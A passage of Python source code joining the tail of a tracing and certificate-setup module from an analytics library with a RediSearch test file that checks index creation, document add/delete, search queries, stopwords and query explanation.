self.mkdir_p(os.path.dirname(self.MH_CA_CERT_PATH))
return open(self.MH_CA_CERT_PATH, 'w')
def __init__(self):
try:
exists = os.path.isfile(self.MH_CA_CERT_PATH)
if exists:
logger.info('EventStreams certificate exists')
else:
if self.MH_CA_CERT is not None and len(self.MH_CA_CERT) > 0 and self.MH_CA_CERT.lower() != 'null':
logger.info('EventStreams create ca certificate file in pem format.')
with self.safe_open_w() as f:
f.write(self.MH_CA_CERT)
else:
logger.info('EventStreams ca certificate is empty.')
if sys.platform == "linux": # Red Hat linux
self.MH_CA_CERT_PATH = '/etc/pki/tls/cert.pem'
elif sys.platform == "darwin": # MAC OS
self.MH_CA_CERT_PATH = '/etc/ssl/cert.pem'
else: # IBM Cloud/Ubuntu
self.MH_CA_CERT_PATH = '/etc/ssl/certs'
except Exception:
logger.error('Initialization of EventStreams failed.')
raise
class Trace(object):
"""
Gather status and diagnostic information to report back in the UI
"""
save_trace_to_file = False
def __init__(self, object_name=None, parent=None, db=None):
if parent is None:
parent = self
self.parent = parent
self.db = db
self.auto_save = None
self.auto_save_thread = None
self.stop_event = None
(self.name, self.cos_path) = self.build_trace_name(object_name=object_name, execution_date=None)
self.data = []
self.df_cols = set()
self.df_index = set()
self.df_count = 0
self.usage = 0
self.prev_ts = dt.datetime.utcnow()
logger.debug('Starting trace')
logger.debug('Trace name: %s', self.name)
logger.debug('auto_save %s', self.auto_save)
self.write(created_by=self.parent, text='Trace started. ')
def as_json(self):
return json.dumps(self.data, indent=4)
def build_trace_name(self, object_name, execution_date):
try:
(trace_name, cos_path) = self.parent.build_trace_name(object_name=object_name,
execution_date=execution_date)
except AttributeError:
if object_name is None:
try:
object_name = self.parent.logical_name
except AttributeError:
object_name = self.parent.name
if execution_date is None:
execution_date = dt.datetime.utcnow()
trace_name = 'auto_trace_%s_%s' % (object_name, execution_date.strftime('%Y%m%d%H%M%S'))
cos_path = ('%s/%s/%s/%s_trace_%s' % (
self.parent.tenant_id, object_name, execution_date.strftime('%Y%m%d'), object_name,
execution_date.strftime('%H%M%S')))
return (trace_name, cos_path)
def get_stack_trace(self):
"""
Extract stack trace entries. Return string.
"""
stack_trace = ''
for t in self.data:
entry = t.get('exception', None)
if entry is not None:
stack_trace = stack_trace + entry + '\n'
entry = t.get('stack_trace', None)
if entry is not None:
stack_trace = stack_trace + entry + '\n'
return stack_trace
def reset(self, object_name=None, execution_date=None, auto_save=None):
"""
Clear trace information and rename trace
"""
self.df_cols = set()
self.df_index = set()
self.df_count = 0
self.usage = 0
self.prev_ts = dt.datetime.utcnow()
self.auto_save = auto_save
if self.auto_save_thread is not None:
logger.debug('Reseting trace %s', self.name)
self.stop()
self.data = []
(self.name, self.cos_path) = self.build_trace_name(object_name=object_name, execution_date=execution_date)
logger.debug('Started a new trace %s ', self.name)
if self.auto_save is not None and self.auto_save > 0:
logger.debug('Initiating auto save for trace')
self.stop_event = threading.Event()
self.auto_save_thread = threading.Thread(target=self.run_auto_save, args=[self.stop_event])
self.auto_save_thread.start()
def run_auto_save(self, stop_event):
"""
Run auto save. Auto save is intended to be run in a separate thread.
"""
last_trace = None
next_autosave = dt.datetime.utcnow()
while not stop_event.is_set():
if next_autosave >= dt.datetime.utcnow():
if self.data != last_trace:
logger.debug('Auto save trace %s' % self.name)
self.save()
last_trace = self.data
next_autosave = dt.datetime.utcnow() + dt.timedelta(seconds=self.auto_save)
time.sleep(0.1)
logger.debug('%s autosave thread has stopped', self.name)
def save(self):
"""
Write trace to COS
"""
try:
save_to_file = self.parent.save_trace_to_file
except AttributeError:
save_to_file = self.save_trace_to_file
trace = None
if len(self.data) == 0:
logger.debug('Trace is empty. Nothing to save.')
else:
trace = str(self.as_json())
if trace is not None:
if save_to_file:
with open('%s.json' % self.name, 'w') as fp:
fp.write(trace)
logger.debug('wrote trace to file %s.json' % self.name)
else:
if self.db is None:
logger.warning('Cannot save trace. No db object supplied')
trace = None
else:
self.db.cos_save(persisted_object=trace, filename=self.cos_path, binary=False, serialize=False)
logger.debug('Saved trace to cos %s', self.cos_path)
return trace
def stop(self):
"""
Stop autosave thead
"""
self.auto_save = None
if self.stop_event is not None:
self.stop_event.set()
if self.auto_save_thread is not None:
self.auto_save_thread.join()
self.auto_save_thread = None
logger.debug('Stopping autosave on trace %s', self.name)
def update_last_entry(self, msg=None, log_method=None, df=None, **kw):
"""
Update the last trace entry. Include the contents of **kw.
"""
kw['updated'] = dt.datetime.utcnow()
self.usage = self.usage + kw.get('usage', 0)
kw['cumulative_usage'] = self.usage
try:
last = self.data.pop()
except IndexError:
last = {}
logger.debug(('Tried to update the last entry of an empty trace.'
' Nothing to update. New entry will be inserted.'))
for key, value in list(kw.items()):
if isinstance(value, pd.DataFrame):
last[key] = 'Ignored dataframe object that was included in trace'
elif not isinstance(value, str):
last[key] = str(value)
if df is not None:
df_info = self._df_as_dict(df=df)
last = {**last, **df_info}
if msg is not None:
last['text'] = last['text'] + msg
self.data.append(last)
# write trace update to the log
if log_method is not None:
if msg is not None:
log_method('Trace message: %s', msg)
if len(kw) > 0:
log_method('Trace payload: %s', kw)
return last
def write(self, created_by, text, log_method=None, df=None, **kwargs):
ts = dt.datetime.utcnow()
text = str(text)
elapsed = (ts - self.prev_ts).total_seconds()
self.prev_ts = ts
kwargs['elapsed_time'] = elapsed
self.usage = self.usage + kwargs.get('usage', 0)
kwargs['cumulative_usage'] = self.usage
try:
created_by_name = created_by.name
except AttributeError:
created_by_name = str(created_by)
entry = {'timestamp': str(ts), 'created_by': created_by_name, 'text': text, 'elapsed_time': elapsed}
for key, value in list(kwargs.items()):
if not isinstance(value, str):
kwargs[key] = str(value)
entry = {**entry, **kwargs}
# The trace can track changes in a dataframe between writes
if df is not None:
df_info = self._df_as_dict(df=df)
entry = {**entry, **df_info}
self.data.append(entry)
exception_type = entry.get('exception_type', None)
exception = entry.get('exception', None)
stack_trace = entry.get('stack_trace', None)
try:
if log_method is not None:
log_method(text)
if exception_type is not None:
log_method(exception_type)
if exception is not None:
log_method(exception)
if stack_trace is not None:
log_method(stack_trace)
except TypeError:
# msg = 'A write to the trace called an invalid logging method. Logging as warning: %s' % text
logger.warning(text)
if exception_type is not None:
logger.warning(exception_type)
if exception is not None:
logger.warning(exception)
if stack_trace is not None:
logger.warning(stack_trace)
def write_usage(self, db, start_ts=None, end_ts=None):
"""
Write usage stats to the usage log
"""
usage_logged = False
msg = 'No db object provided. Did not write usage'
usage = []
for i in self.data:
result = int(i.get('usage', 0))
if end_ts is None:
end_ts = dt.datetime.utcnow()
if start_ts is None:
elapsed = float(i.get('elapsed_time', '0'))
start_ts = end_ts - dt.timedelta(seconds=elapsed)
if result > 0:
entry = {"entityTypeName": self.parent.name, "kpiFunctionName": i.get('created_by', 'unknown'),
"startTimestamp": str(start_ts), "endTimestamp": str(end_ts),
"numberOfResultsProcessed": result}
usage.append(entry)
if len(usage) > 0:
if db is not None:
try:
db.http_request(object_type='usage', object_name='', request='POST', payload=usage)
except BaseException as e:
msg = 'Unable to write usage. %s' % str(e)
else:
usage_logged = True
else:
msg = 'No usage recorded for this execution'
if not usage_logged:
logger.info(msg)
if len(usage) > 0:
logger.info(usage)
def _df_as_dict(self, df):
"""
Gather stats about changes to the dataframe between trace entries
"""
data = {}
if df is None:
data['df'] = 'Ignored null dataframe'
elif not isinstance(df, pd.DataFrame):
data['df'] = 'Ignored non dataframe of type %s' % df.__class__.__name__
else:
if len(df.index) > 0:
prev_count = self.df_count
prev_cols = self.df_cols
self.df_count = len(df.index)
if df.index.names is None:
self.df_index = {}
else:
self.df_index = set(df.index.names)
self.df_cols = set(df.columns)
# stats
data['df_count'] = self.df_count
data['df_index'] = list(self.df_index)
# look at changes
if self.df_count != prev_count:
data['df_rowcount_change'] = self.df_count - prev_count
if len(self.df_cols - prev_cols) > 0:
data['df_added_columns'] = list(self.df_cols - prev_cols)
if len(prev_cols - self.df_cols) > 0:
data['df_added_columns'] = list(prev_cols - self.df_cols)
else:
data['df'] = 'Empty dataframe'
return data
def __str__(self):
out = ''
for entry in self.data:
out = out + entry['text']
return out
|
test.py
|
# -*- coding: utf-8 -*-
import redis
import unittest
from hotels import hotels
import random
import time
from RLTest import Env
from includes import *
def testAdd(env):
if env.is_cluster():
raise unittest.SkipTest()
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text', 'body', 'text'))
env.assertTrue(r.exists('idx:idx'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 1.0, 'fields',
'title', 'hello world',
'body', 'lorem ist ipsum'))
for _ in r.retry_with_rdb_reload():
prefix = 'ft'
env.assertExists(prefix + ':idx/hello')
env.assertExists(prefix + ':idx/world')
env.assertExists(prefix + ':idx/lorem')
def testAddErrors(env):
env.expect('ft.create idx schema foo text bar numeric sortable').equal('OK')
env.expect('ft.add idx doc1 1 redis 4').error().contains('Unknown keyword')
env.expect('ft.add idx doc1').error().contains("wrong number of arguments")
env.expect('ft.add idx doc1 42').error().contains("Score must be between 0 and 1")
env.expect('ft.add idx doc1 1.0').error().contains("No field list found")
env.expect('ft.add fake_idx doc1 1.0 fields foo bar').error().contains("Unknown index name")
def assertEqualIgnoreCluster(env, val1, val2):
# todo: each test that uses this function should be switch back to env.assertEqual once fix
# issues on coordinator
if env.isCluster():
return
env.assertEqual(val1, val2)
def testConditionalUpdate(env):
env.assertOk(env.cmd(
'ft.create', 'idx', 'schema', 'foo', 'text', 'bar', 'numeric', 'sortable'))
env.assertOk(env.cmd('ft.add', 'idx', '1', '1',
'fields', 'foo', 'hello', 'bar', '123'))
env.assertOk(env.cmd('ft.add', 'idx', '1', '1', 'replace', 'if',
'@foo == "hello"', 'fields', 'foo', 'world', 'bar', '123'))
env.assertEqual('NOADD', env.cmd('ft.add', 'idx', '1', '1', 'replace',
'if', '@foo == "hello"', 'fields', 'foo', 'world', 'bar', '123'))
env.assertEqual('NOADD', env.cmd('ft.add', 'idx', '1', '1', 'replace',
'if', '1 == 2', 'fields', 'foo', 'world', 'bar', '123'))
env.assertOk(env.cmd('ft.add', 'idx', '1', '1', 'replace', 'partial', 'if',
'@foo == "world"', 'fields', 'bar', '234'))
env.assertOk(env.cmd('ft.add', 'idx', '1', '1', 'replace', 'if',
'@bar == 234', 'fields', 'foo', 'hello', 'bar', '123'))
# Ensure that conditionals are ignored if the document doesn't exist
env.assertOk(env.cmd('FT.ADD', 'idx', '666', '1',
'IF', '@bar > 42', 'FIELDS', 'bar', '15'))
# Ensure that it fails if we try again, because it already exists
env.assertEqual('NOADD', env.cmd('FT.ADD', 'idx', '666', '1',
'REPLACE', 'IF', '@bar > 42', 'FIELDS', 'bar', '15'))
# Ensure that it fails because we're not using 'REPLACE'
with env.assertResponseError():
env.assertOk(env.cmd('FT.ADD', 'idx', '666', '1',
'IF', '@bar > 42', 'FIELDS', 'bar', '15'))
def testUnionIdList(env):
# Regression test for https://github.com/RediSearch/RediSearch/issues/306
r = env
N = 100
env.assertOk(r.execute_command(
"ft.create", "test", "SCHEMA", "tags", "TAG", "waypoint", "GEO"))
env.assertOk(r.execute_command(
"ft.add", "test", "1", "1", "FIELDS", "tags", "alberta", "waypoint", "-113.524,53.5244"))
env.assertOk(r.execute_command(
"ft.add", "test", "2", "1", "FIELDS", "tags", "ontario", "waypoint", "-79.395,43.661667"))
r.cmd('ft.search', 'test', '@tags:{ontario}')
res = r.execute_command(
'ft.search', 'test', "@waypoint:[-113.52 53.52 20 mi]|@tags:{ontario}", 'nocontent')
env.assertEqual(res, [2, '2', '1'])
def testAttributes(env):
env.assertOk(env.cmd('ft.create', 'idx', 'schema',
'title', 'text', 'body', 'text'))
env.assertOk(env.cmd('ft.add', 'idx', 'doc1', 1.0, 'fields',
'title', 't1 t2', 'body', 't3 t4 t5'))
env.assertOk(env.cmd('ft.add', 'idx', 'doc2', 1.0, 'fields',
'body', 't1 t2', 'title', 't3 t5'))
res = env.cmd(
'ft.search', 'idx', '(@title:(t1 t2) => {$weight: 0.2}) |(@body:(t1 t2) => {$weight: 0.5})', 'nocontent')
env.assertListEqual([2L, 'doc2', 'doc1'], res)
res = env.cmd(
'ft.search', 'idx', '(@title:(t1 t2) => {$weight: 2.5}) |(@body:(t1 t2) => {$weight: 0.5})', 'nocontent')
env.assertListEqual([2L, 'doc1', 'doc2'], res)
res = env.cmd(
'ft.search', 'idx', '(t3 t5) => {$slop: 4}', 'nocontent')
env.assertListEqual([2L, 'doc2', 'doc1'], res)
res = env.cmd(
'ft.search', 'idx', '(t5 t3) => {$slop: 0}', 'nocontent')
env.assertListEqual([1L, 'doc2'], res)
res = env.cmd(
'ft.search', 'idx', '(t5 t3) => {$slop: 0; $inorder:true}', 'nocontent')
env.assertListEqual([0], res)
def testUnion(env):
N = 100
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'f', 'text'))
for i in range(N):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'f', 'hello world' if i % 2 == 0 else 'hallo werld'))
for _ in r.retry_with_rdb_reload():
res = r.execute_command(
'ft.search', 'idx', 'hello|hallo', 'nocontent', 'limit', '0', '100')
env.assertEqual(N + 1, len(res))
env.assertEqual(N, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello|world', 'nocontent', 'limit', '0', '100')
env.assertEqual(51, len(res))
env.assertEqual(50, res[0])
res = r.execute_command('ft.search', 'idx', '(hello|hello)(world|world)',
'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(51, len(res))
env.assertEqual(50, res[0])
res = r.execute_command(
'ft.search', 'idx', '(hello|hallo)(werld|world)', 'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(101, len(res))
env.assertEqual(100, res[0])
res = r.execute_command(
'ft.search', 'idx', '(hallo|hello)(world|werld)', 'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(101, len(res))
env.assertEqual(100, res[0])
res = r.execute_command(
'ft.search', 'idx', '(hello|werld)(hallo|world)', 'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(101, len(res))
env.assertEqual(100, res[0])
res = r.execute_command(
'ft.search', 'idx', '(hello|hallo) world', 'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(51, len(res))
env.assertEqual(50, res[0])
res = r.execute_command(
'ft.search', 'idx', '(hello world)|((hello world)|(hallo world|werld) | hello world werld)', 'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(101, len(res))
env.assertEqual(100, res[0])
def testSearch(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text', 'weight', 10.0, 'body', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 0.5, 'fields',
'title', 'hello world',
'body', 'lorem ist ipsum'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1.0, 'fields',
'title', 'hello another world',
'body', 'lorem ist ipsum lorem lorem'))
for _ in r.retry_with_rdb_reload():
res = r.execute_command('ft.search', 'idx', 'hello')
env.assertTrue(len(res) == 5)
env.assertEqual(res[0], 2L)
env.assertEqual(res[1], "doc2")
env.assertTrue(isinstance(res[2], list))
env.assertTrue('title' in res[2])
env.assertTrue('hello another world' in res[2])
env.assertEqual(res[3], "doc1")
env.assertTrue('hello world' in res[4])
# Test empty query
res = r.execute_command('ft.search', 'idx', '')
env.assertListEqual([0], res)
# Test searching with no content
res = r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent')
env.assertTrue(len(res) == 3)
env.assertEqual(res[0], 2L)
env.assertEqual(res[1], "doc2")
env.assertEqual(res[2], "doc1")
# Test searching WITHSCORES
res = r.execute_command(
'ft.search', 'idx', 'hello', 'WITHSCORES')
env.assertEqual(len(res), 7)
env.assertEqual(res[0], 2L)
env.assertEqual(res[1], "doc2")
env.assertTrue(float(res[2]) > 0)
env.assertEqual(res[4], "doc1")
env.assertTrue(float(res[5]) > 0)
# Test searching WITHSCORES NOCONTENT
res = r.execute_command(
'ft.search', 'idx', 'hello', 'WITHSCORES', 'NOCONTENT')
env.assertEqual(len(res), 5)
env.assertEqual(res[0], 2L)
env.assertEqual(res[1], "doc2")
env.assertTrue(float(res[2]) > 0)
env.assertEqual(res[3], "doc1")
env.assertTrue(float(res[4]) > 0)
def testSearchNosave(env):
# Check to see what happens when we try to return unsaved documents
env.cmd('ft.create', 'idx', 'SCHEMA', 'f1', 'text')
# Add 3 documents
for x in range(3):
env.cmd('ft.add', 'idx', 'doc{}'.format(x),
1.0, 'NOSAVE', 'FIELDS', 'f1', 'value')
# Now query the results
res = env.cmd('ft.search', 'idx', 'value')
env.assertEqual(3, res[0])
for content in res[2::2]:
env.assertEqual([], content)
def testGet(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text', 'bar', 'text'))
env.expect('ft.get').error().contains("wrong number of arguments")
env.expect('ft.get', 'idx').error().contains("wrong number of arguments")
env.expect('ft.get', 'idx', 'foo', 'bar').error().contains("wrong number of arguments")
env.expect('ft.mget').error().contains("wrong number of arguments")
env.expect('ft.mget', 'idx').error().contains("wrong number of arguments")
env.expect('ft.mget', 'fake_idx').error().contains("wrong number of arguments")
env.expect('ft.get fake_idx foo').error().contains("Unknown Index name")
env.expect('ft.mget fake_idx foo').error().contains("Unknown Index name")
for i in range(100):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'foo', 'hello world', 'bar', 'wat wat'))
for i in range(100):
res = r.execute_command('ft.get', 'idx', 'doc%d' % i)
env.assertIsNotNone(res)
env.assertListEqual(
['foo', 'hello world', 'bar', 'wat wat'], res)
env.assertIsNone(r.execute_command(
'ft.get', 'idx', 'doc%dsdfsd' % i))
env.expect('ft.get', 'no_idx', 'doc0').error().contains("Unknown Index name")
rr = r.execute_command(
'ft.mget', 'idx', *('doc%d' % i for i in range(100)))
env.assertEqual(len(rr), 100)
for res in rr:
env.assertIsNotNone(res)
env.assertListEqual(
['foo', 'hello world', 'bar', 'wat wat'], res)
rr = r.execute_command(
'ft.mget', 'idx', *('doc-%d' % i for i in range(100)))
env.assertEqual(len(rr), 100)
for res in rr:
env.assertIsNone(res)
# Verify that when a document is deleted, GET returns NULL
r.cmd('ft.del', 'idx', 'doc10') # But we still keep the document
r.cmd('ft.del', 'idx', 'doc11')
r.cmd('ft.del', 'idx', 'coverage')
res = r.cmd('ft.get', 'idx', 'doc10')
r.assertEqual(None, res)
res = r.cmd('ft.mget', 'idx', 'doc10')
r.assertEqual([None], res)
res = r.cmd('ft.mget', 'idx', 'doc10', 'doc11', 'doc12')
r.assertIsNone(res[0])
r.assertIsNone(res[1])
r.assertTrue(not not res[2])
def testDelete(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'f', 'text'))
for i in range(100):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'f', 'hello world'))
env.expect('ft.del', 'fake_idx', 'doc1').error()
for i in range(100):
# the doc hash should exist now
r.expect('ft.get', 'idx', 'doc%d' % i).notRaiseError()
# Delete the actual docs only half of the time
env.assertEqual(1, r.execute_command(
'ft.del', 'idx', 'doc%d' % i, 'DD' if i % 2 == 0 else ''))
# second delete should return 0
env.assertEqual(0, r.execute_command(
'ft.del', 'idx', 'doc%d' % i))
# After del with DD the doc hash should not exist
if i % 2 == 0:
env.assertFalse(r.exists('doc%d' % i))
else:
r.expect('ft.get', 'idx', 'doc%d' % i).notRaiseError()
res = r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'limit', 0, 100)
env.assertNotIn('doc%d' % i, res)
env.assertEqual(res[0], 100 - i - 1)
env.assertEqual(len(res), 100 - i)
# test reinsertion
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'f', 'hello world'))
res = r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'limit', 0, 100)
env.assertIn('doc%d' % i, res)
env.assertEqual(1, r.execute_command(
'ft.del', 'idx', 'doc%d' % i))
for _ in r.retry_with_rdb_reload():
did = 'rrrr'
env.assertOk(r.execute_command('ft.add', 'idx', did, 1, 'fields',
'f', 'hello world'))
env.assertEqual(1, r.execute_command('ft.del', 'idx', did))
env.assertEqual(0, r.execute_command('ft.del', 'idx', did))
env.assertOk(r.execute_command('ft.add', 'idx', did, 1, 'fields',
'f', 'hello world'))
env.assertEqual(1, r.execute_command('ft.del', 'idx', did))
env.assertEqual(0, r.execute_command('ft.del', 'idx', did))
def testReplace(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'f', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 1.0, 'fields',
'f', 'hello world'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1.0, 'fields',
'f', 'hello world'))
res = r.execute_command(
'ft.search', 'idx', 'hello world')
env.assertEqual(2, res[0])
with env.assertResponseError():
# make sure we can't insert a doc twice
res = r.execute_command('ft.add', 'idx', 'doc1', 1.0, 'fields',
'f', 'hello world')
# now replace doc1 with a different content
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 1.0, 'replace', 'fields',
'f', 'goodbye universe'))
for _ in r.retry_with_rdb_reload():
# make sure the query for hello world does not return the replaced
# document
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'nocontent')
env.assertEqual(1, res[0])
env.assertEqual('doc2', res[1])
# search for the doc's new content
res = r.execute_command(
'ft.search', 'idx', 'goodbye universe', 'nocontent')
env.assertEqual(1, res[0])
env.assertEqual('doc1', res[1])
def testDrop(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'f', 'text', 'n', 'numeric', 't', 'tag', 'g', 'geo'))
for i in range(100):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'f', 'hello world', 'n', 666, 't', 'foo bar',
'g', '19.04,47.497'))
keys = r.keys('*')
env.assertGreaterEqual(len(keys), 100)
env.assertOk(r.execute_command('ft.drop', 'idx'))
keys = r.keys('*')
env.assertEqual(0, len(keys))
# Now do the same with KEEPDOCS
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'f', 'text', 'n', 'numeric', 't', 'tag', 'g', 'geo'))
for i in range(100):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'f', 'hello world', 'n', 666, 't', 'foo bar',
'g', '19.04,47.497'))
keys = r.keys('*')
env.assertGreaterEqual(len(keys), 100)
if not env.is_cluster():
env.assertOk(r.execute_command('ft.drop', 'idx', 'KEEPDOCS'))
keys = r.keys('*')
env.assertListEqual(['doc0', 'doc1', 'doc10', 'doc11', 'doc12', 'doc13', 'doc14', 'doc15', 'doc16', 'doc17', 'doc18', 'doc19', 'doc2', 'doc20', 'doc21', 'doc22', 'doc23', 'doc24', 'doc25', 'doc26', 'doc27', 'doc28', 'doc29', 'doc3', 'doc30', 'doc31', 'doc32', 'doc33', 'doc34', 'doc35', 'doc36', 'doc37', 'doc38', 'doc39', 'doc4', 'doc40', 'doc41', 'doc42', 'doc43', 'doc44', 'doc45', 'doc46', 'doc47', 'doc48', 'doc49', 'doc5', 'doc50', 'doc51', 'doc52', 'doc53',
'doc54', 'doc55', 'doc56', 'doc57', 'doc58', 'doc59', 'doc6', 'doc60', 'doc61', 'doc62', 'doc63', 'doc64', 'doc65', 'doc66', 'doc67', 'doc68', 'doc69', 'doc7', 'doc70', 'doc71', 'doc72', 'doc73', 'doc74', 'doc75', 'doc76', 'doc77', 'doc78', 'doc79', 'doc8', 'doc80', 'doc81', 'doc82', 'doc83', 'doc84', 'doc85', 'doc86', 'doc87', 'doc88', 'doc89', 'doc9', 'doc90', 'doc91', 'doc92', 'doc93', 'doc94', 'doc95', 'doc96', 'doc97', 'doc98', 'doc99'], sorted(keys))
env.expect('FT.DROP', 'idx', 'KEEPDOCS', '666').error().contains("wrong number of arguments")
def testCustomStopwords(env):
r = env
# Index with default stopwords
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text'))
# Index with custom stopwords
env.assertOk(r.execute_command('ft.create', 'idx2', 'stopwords', 2, 'hello', 'world',
'schema', 'foo', 'text'))
if not env.isCluster:
res = env.cmd('ft.info', 'idx2')
env.assertEqual(res[39], ['hello', 'world'])
# Index with NO stopwords
env.assertOk(r.execute_command('ft.create', 'idx3', 'stopwords', 0,
'schema', 'foo', 'text'))
if not env.isCluster:
res = env.cmd('ft.info', 'idx3')
env.assertEqual(res[39], [])
for idx in ('idx', 'idx2', 'idx3'):
env.assertOk(r.execute_command(
'ft.add', idx, 'doc1', 1.0, 'fields', 'foo', 'hello world'))
env.assertOk(r.execute_command(
'ft.add', idx, 'doc2', 1.0, 'fields', 'foo', 'to be or not to be'))
for _ in r.retry_with_rdb_reload():
# Normal index should return results just for 'hello world'
env.assertEqual([1, 'doc1'], r.execute_command(
'ft.search', 'idx', 'hello world', 'nocontent'))
env.assertEqual([0], r.execute_command(
'ft.search', 'idx', 'to be or not', 'nocontent'))
# Custom SW index should return results just for 'to be or not'
env.assertEqual([0], r.execute_command(
'ft.search', 'idx2', 'hello world', 'nocontent'))
env.assertEqual([1, 'doc2'], r.execute_command(
'ft.search', 'idx2', 'to be or not', 'nocontent'))
# No SW index should return results for both
env.assertEqual([1, 'doc1'], r.execute_command(
'ft.search', 'idx3', 'hello world', 'nocontent'))
env.assertEqual([1, 'doc2'], r.execute_command(
'ft.search', 'idx3', 'to be or not', 'nocontent'))
def testStopwords(env):
# This test was taken from Python's tests, and failed due to some changes
# made earlier
env.cmd('ft.create', 'idx', 'stopwords', 3, 'foo',
'bar', 'baz', 'schema', 'txt', 'text')
env.cmd('ft.add', 'idx', 'doc1', 1.0, 'fields', 'txt', 'foo bar')
env.cmd('ft.add', 'idx', 'doc2', 1.0, 'fields', 'txt', 'hello world')
r1 = env.cmd('ft.search', 'idx', 'foo bar', 'nocontent')
r2 = env.cmd('ft.search', 'idx', 'foo bar hello world', 'nocontent')
env.assertEqual(0, r1[0])
env.assertEqual(1, r2[0])
def testNoStopwords(env):
# This test taken from Java's test suite
env.cmd('ft.create', 'idx', 'schema', 'title', 'text')
for i in range(100):
env.cmd('ft.add', 'idx', 'doc{}'.format(i), 1.0, 'fields',
'title', 'hello world' if i % 2 == 0 else 'hello worlds')
res = env.cmd('ft.search', 'idx', 'hello a world', 'NOCONTENT')
env.assertEqual(100, res[0])
res = env.cmd('ft.search', 'idx', 'hello a world',
'VERBATIM', 'NOCONTENT')
env.assertEqual(50, res[0])
res = env.cmd('ft.search', 'idx', 'hello a world', 'NOSTOPWORDS')
env.assertEqual(0, res[0])
def testOptional(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx',
'doc1', 1.0, 'fields', 'foo', 'hello wat woot'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2',
1.0, 'fields', 'foo', 'hello world woot'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc3',
1.0, 'fields', 'foo', 'hello world werld'))
res = r.execute_command('ft.search', 'idx', 'hello', 'nocontent')
env.assertEqual([3L, 'doc3', 'doc2', 'doc1'], res)
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'nocontent', 'scorer', 'DISMAX')
env.assertEqual([2L, 'doc3', 'doc2'], res)
res = r.execute_command(
'ft.search', 'idx', 'hello ~world', 'nocontent', 'scorer', 'DISMAX')
env.assertEqual([3L, 'doc3', 'doc2', 'doc1'], res)
res = r.execute_command(
'ft.search', 'idx', 'hello ~world ~werld', 'nocontent', 'scorer', 'DISMAX')
env.assertEqual([3L, 'doc3', 'doc2', 'doc1'], res)
res = r.execute_command(
'ft.search', 'idx', '~world ~werld hello', 'nocontent', 'scorer', 'DISMAX')
env.assertEqual([3L, 'doc3', 'doc2', 'doc1'], res)
def testExplain(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text', 'bar', 'numeric', 'sortable'))
q = '(hello world) "what what" hello|world @bar:[10 100]|@bar:[200 300]'
res = r.execute_command('ft.explain', 'idx', q)
# print res.replace('\n', '\\n')
# expected = """INTERSECT {\n UNION {\n hello\n +hello(expanded)\n }\n UNION {\n world\n +world(expanded)\n }\n EXACT {\n what\n what\n }\n UNION {\n UNION {\n hello\n +hello(expanded)\n }\n UNION {\n world\n +world(expanded)\n }\n }\n UNION {\n NUMERIC {10.000000 <= @bar <= 100.000000}\n NUMERIC {200.000000 <= @bar <= 300.000000}\n }\n}\n"""
# expected = """INTERSECT {\n UNION {\n hello\n <HL(expanded)\n +hello(expanded)\n }\n UNION {\n world\n <ARLT(expanded)\n +world(expanded)\n }\n EXACT {\n what\n what\n }\n UNION {\n UNION {\n hello\n <HL(expanded)\n +hello(expanded)\n }\n UNION {\n world\n <ARLT(expanded)\n +world(expanded)\n }\n }\n UNION {\n NUMERIC {10.000000 <= @bar <= 100.000000}\n NUMERIC {200.000000 <= @bar <= 300.000000}\n }\n}\n"""
expected = """INTERSECT {\n UNION {\n hello\n +hello(expanded)\n }\n UNION {\n world\n +world(expanded)\n }\n EXACT {\n what\n what\n }\n UNION {\n UNION {\n hello\n +hello(expanded)\n }\n UNION {\n world\n +world(expanded)\n }\n }\n UNION {\n NUMERIC {10.000000 <= @bar <= 100.000000}\n NUMERIC {200.000000 <= @bar <= 300.000000}\n }\n}\n"""
env.assertEqual(res, expected)
